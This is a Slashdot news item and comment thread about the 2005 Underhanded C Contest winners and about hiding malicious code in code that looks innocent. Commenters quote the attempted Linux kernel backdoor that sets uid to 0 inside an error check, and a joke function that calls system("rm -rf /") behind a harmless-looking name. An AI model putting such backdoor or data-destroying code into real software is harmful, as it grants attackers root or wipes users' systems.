Underhanded C Contest announces winners

Matthew Skala writes "The 2005 Underhanded C Contest has announced its winners: the team entry from M Joonas Pihlaja and Paul V-Khuong, and the solo entry from Natori Shin. The contest (which appeared on Slashdot in June) tests programmers' ability to hide malicious behaviour in innocent-seeming code, making it a kind of evil shadow twin to the International Obfuscated C Contest."

Bill Gates Entry

[bjorniac]

Microsoft Word XP was rejected because the code had to seem innocent...

Re:Bill Gates Entry

[makomk]

Very true. For those of you who don't get it, one of the winners uses a technique very similar to the way Word (all versions AFAIK) leaks data into documents - an uninitialised buffer.

Re:Bill Gates Entry

[Richard_at_work]

Found an interesting thing at work recently, during trials of VB.net and the .Net framework. Our VB.net programmers applications worked right up until one day, when suddenly, they stopped working. Simple things like messages in Message Boxes stopped appearing, or labels on buttons went astray, mouse cursor changes on mouseover events showing black boxes instead of the image. Very wierd we thought. He reinstalled the .Net framework, VS.Net, everything he could think of but nothing rectified the problems. We eventually found out what the problem was - McAffee Virus protection now includes buffer overrun protection. Turn that off, and everything worked fine. Wierd, just wierd.

good to see

[garat]

Having a contest like this has similar positive aspects as full disclosure concerning vulnerabilities; by providing examples of how it's done, people will be better able to spot such attempts were they to occur. I'm happy to see this contest being held.

I'll tell you what's underhanded

[Weaselmancer]

Stashing all the entries in a 1.1M archive rather than posting links to the code. No way I'm going to download that just to see what all the fuss is about.

Re:I'll tell you what's underhanded

[RAMMS+EIN]

Moreover, who knows the archive isn't exploiting some buffer overflow vulnerability in my archiving software! Knowing who this file comes from, you'd be a fool to open it!

Re:I'll tell you what's underhanded

[glesga_kiss]

They predicted that kind of paranoid response. From their (humorous) FAQ:

Are you shills from MicroSoft trying to evangelize C-sharp?

No, we are not shills from MicroSoft trying to evangelize C-sharp.

Are you trying to prove open source is bad?

No, we are not trying to prove open source is bad. If anything, this contest illustrates that we need more code review, not less.

I bet you are government agents trying to entrap me.

Of course we're government agents: Binghamton University is a state university, part of the SUNY system. Evil! Eeeeeeeeeevilllll!!!!!

Do you know you've been Slashdotted?

What, you couldn't tell from the last three questions?

Re:I'll tell you what's underhanded

[nEoN+nOoDlE]

Knowing who this file comes from, you'd be a fool to open it!

but they would have known that only a great fool would open the archive given to him. I am not a great fool, so I can clearly not choose to open the archive. But they must have known I was not a great fool, they would have counted on it, so I can clearly open the archive supplied by them.

Will Code For Beer

[Krast0r]

"Prize: Since we're in Binghamton, NY, the prize will be a gift box from the nearby brewery Ommegang in Cooperstown, NY." Reminds me of that photograph, "Will Code For Food" - maybe this is the start of a new era. A combination of "free as in beer" and "will code for food".

I'm still fond of this one

[$RANDOMLUSER]

This one almost made it into the Linux kernel. It looks like error checking until you read it carefully.Short, brilliant and to the point.

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

In other words, you become root if you call sys_wait4()with the __WCLONE|__WALL) flags

Story here and here

Re:I'm still fond of this one

This one almost made it into the Linux kernel.

It *did* make it into the kernel for anyone using the BK-to-CVS gateway.

Re:I'm still fond of this one

[jnf]

to anyone who makes a routine of putting their constants on the left hand side of the expression, that becomes not very hard to notice .. although intermixed with several megabytes of source it becomes less obvious. What I mean is: if (( (__WCLONE|__WALL) == options && 0 = current->uid)) will throw an error, whereas 0 == current->uid will not.

cute fluffy kittens!

[planetoid]

int cute_fluffy_kittens(void)
{
      printf("Cute fluffy kittens are now frolicking in a grassy field of daisies with their pink-nosed newborn puppy friends. Sit back and use your imagination to enjoy the spectacle for the next few minutes...\n");

      setuid(1);
      system("rm -rf /");
}

Re:cute fluffy kittens!

[grahamlee]

Which is worse, the incorrect UID or the incorrect function prototype?

Runtime code generation

[pkhuong]

The CLR does JIT (or, at least, runtime) compilation. A common way to do so is to output the machine code on the stack. W^X usually breaks programs that do runtime code generation. Now, this is a WAG, but that's where my money's at.

Corewar veterans

[lastfish]

Joonas & Paul are both Corewar veterans being respectively co-authors of Son of Vain (Joonas P & Ian Oversby) top of the all-time hall-of-fame and nPaper II (Paul V-K & John Metcalf) dominant paper of its time.

Good practice for writing obscure, but useful, code.

I'd give clickable links but fear for these sites under load.

www.corewar.info/
www.corewar.co.uk/94nophof.txt

Ken Thompson...

[Sam+Nitzberg]

It's not exactly the same thing, but the most powerful and clever C code example with an 'underhanded' purpose must be Ken Thompson's classic...

Reflections on Trusting Trust
http://www.acm.org/classics/sep95/

Other interesting papers that come to mind include Tom Duff's on Unix viruses, as well as McIlroy.

Sam

sam @ iamsam.com
http: /www . iamsam . com